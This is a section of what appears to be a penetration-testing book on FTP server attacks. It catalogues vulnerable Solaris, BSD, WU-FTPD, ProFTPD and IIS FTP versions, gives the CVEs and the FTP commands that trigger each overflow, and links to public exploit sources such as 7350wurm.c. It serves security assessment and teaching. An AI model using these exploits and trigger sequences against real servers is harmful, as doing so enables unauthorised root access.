8.6 FTP Process Manipulation Attacks

If an attacker can accurately identify the target FTP service and the operating platform
and architecture of the target server, it is relatively
straightforward to identify and launch process-manipulation attacks
to gain access to the server.

Most serious remote buffer overflows in FTP services are
post-authentication issues; they require authenticated access to the
FTP service and its underlying commands. Increasingly, write access
is also required to create complex directory structures server-side
that allow exploitation.

8.6.1 Solaris and BSD FTP Globbing Issues

The following glob( ) bug is present in default
Solaris installations up to Solaris 8.
By issuing a series of CWD~username requests, an attacker can
effectively enumerate valid user accounts without even logging into
the FTP server. This issue is described in detail at http://www.iss.net/security_center/static/6332.php
and demonstrated in Example 8-6.

In the example, blah and
test users don't exist, but
chris does. A similar postauthentication
glob( ) bug can be exploited, which result in a
heap overflow. Example 8-7 details how local users
can easily abuse this vulnerability, resulting in a core dump
containing encrypted user passwords from the
/etc/shadow file. These two issues are
referenced within the MITRE CVE list as CVE-2001-0421.

No public preauthentication exploits have been released to compromise
Solaris hosts by abusing glob( ) issues.
Theoretically, the service can be exploited under Solaris if write
access to the filesystem is permitted through FTP (see
CVE-2001-0249), although this may be difficult to exploit under
Solaris.

The glob( ) function called by FTP is also
vulnerable to attack under BSD-derived systems (NetBSD, OpenBSD, and
FreeBSD) due to the way heap memory is managed. An exploit script for
this issue is available at http://www.phreak.org/archives/exploits/unix/ftpd-exploits/turkey2.c.

8.6.2 WU-FTPD Vulnerabilities

WU-FTPD is a popular and
easy-to-manage FTP service that many system administrators run across
multiple Unix-like platforms (primarily Linux). Here, I present a
breakdown of recent serious remotely exploitable (omitting
denial-of-service or locally exploitable issues) vulnerabilities in
various versions of WU-FTP, with details of working exploit scripts.
For the latest details of bugs in this software, Be sure to heck the
MITRE CVE and ISS X-Force databases at http://cve.mitre.org and http://xforce.iss.net, respectively.

WU-FTPD 2.4.2 BETA 18

By creating a complex directory structure and issuing a
DELE command, a stack overflow occurs. An exploit
is available for Linux targets at http://examples.oreilly.com/networksa/tools/w00f.c,
and further information is available at http://xforce.iss.net/xforce/xfdb/1728.

WU-FTPD 2.5.0

This is exploitable by creating a complex directory structure and
issuing a series of CWD commands, resulting in a
stack overflow. An exploit is available for Linux targets at
http://examples.oreilly.com/networksa/tools/ifafoffuffoffaf.c,
and further information is available at http://xforce.iss.net/xforce/xfdb/3158.

WU-FTPD 2.6.0

This is exploitable by issuing a crafted SITE EXEC
command on the FTP server, resulting in the exploitation of a format
string bug. Various scripts exist to exploit this under FreeBSD and
various Linux distributions, of which a favorite of mine is
http://examples.oreilly.com/networksa/tools/wuftp-god.c.
Background information is available at http://xforce.iss.net/xforce/xfdb/4773.

WU-FTPD 2.6.1

By issuing a series of RNFR and CWD
~{ commands to the FTP service, a heap overflow occurs
through the glob( ) function. TESO released the
excellent 7350wurm exploit script to compromise
various Linux distributions, available at http://examples.oreilly.com/networksa/tools/7350wurm.c.
Further information is available at http://xforce.iss.net/xforce/xfdb/7611.

WU-FTPD 2.6.2

The realpath( ) function within WU-FTP contains an
off-by-one bug, which you can exploit by issuing a number of FTP
commands (including STOR, RETR,
MKD, and RMD). An exploit that
compromises various Linux distributions is available at http://examples.oreilly.com/networksa/tools/0x82-wu262.c.
You should check MITRE CVE at http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466
for information because the ISS X-Force web site
doesn't list any details for this issue at the time
of writing.

8.6.2.1 Exploiting WU-FTPD 2.6.1 on Linux with 7350wurm

The 7350wurm exploit can root most Linux WU-FTPD
services through its in-built list of targets. The usage of the tool
is shown in Example 8-8.

8.6.3 ProFTPD Vulnerabilities

ProFTPD is similar to WU-FTPD in
that it can be run from multiple operating platforms. I often see
ProFTPD running on FreeBSD and Slackware Linux in the wild. Table 8-3 lists recent serious remotely exploitable
issues in ProFTPD as listed in the MITRE CVE at the time of writing.

Public exploit code for two of the CVE candidate references listed in
Table 8-3 can be found in the Packet Storm
archives.

CAN-1999-0911, MKD and CWD
stack overflow can be found at the following:

http://packetstormsecurity.org/groups/teso/pro.tar.gz

http://packetstormsecurity.org/advisories/b0f/proftpd.c

http://packetstormsecurity.org/0007-exploits/proftpX.c

CAN-2003-0831, ASCII transfer mode newline character overflow can be
found at http://packetstormsecurity.org/0310-exploits/proftpdr00t.c.

8.6.4 Microsoft IIS FTP Server

At the time of writing, the only serious vulnerabilities that
threaten
Microsoft IIS FTP services are
denial-of-service issues, usually exploitable through an
authenticated FTP session. Two remotely exploitable security issues
in the IIS 4.0 and 5.0 FTP services are listed within MITRE CVE as
CVE-2001-0335 and CVE-1999-0777; both are medium-risk issues relating
to information leakage from the service.

A common oversight is for system administrators to set up
Internet-based IIS FTP servers and leave anonymous guest access to
the server enabled.I have seen such open servers used as public
storage and distribution centers for pirated software and other
material.